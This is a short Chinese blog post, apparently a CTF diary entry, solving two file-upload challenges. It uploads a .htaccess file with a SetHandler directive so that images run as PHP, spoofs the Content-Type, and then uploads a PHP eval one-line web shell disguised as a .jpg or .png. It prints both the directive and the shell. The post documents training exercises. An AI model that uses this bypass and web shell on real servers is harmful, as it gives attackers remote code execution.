本文主要是介绍CTF第十一天,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
[GXYCTF2019]BabyUpload 1
先上传一个.htaccess文件,它可以把之后传的文件当作php文件解析,文件的内容
SetHandler application/x-httpd-php
把Content—Type改成image/jpeg
再上传一个jpg类型的一句话木马
<script language="php">eval($_POST['shell']);</script>
拼接下路径
http://8c859d42-abd9-4cc8-a633-c384a1dc7db2.node3.buuoj.cn/upload/bece1b6af119ab27c4f60e69ce75ce1b/kk.jpg
在根目录找到flag就行
之前试了好几次都不行,我也不知道为什么总是返回数据为空难道是htaccess文件没有文件名只有后缀?
[MRCTF2020]你传你🐎呢 1
这题和上题一样,先用.htaccess文件开路(注意改Content—Type),再上传.png的一句话木马
这篇关于CTF第十一天的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!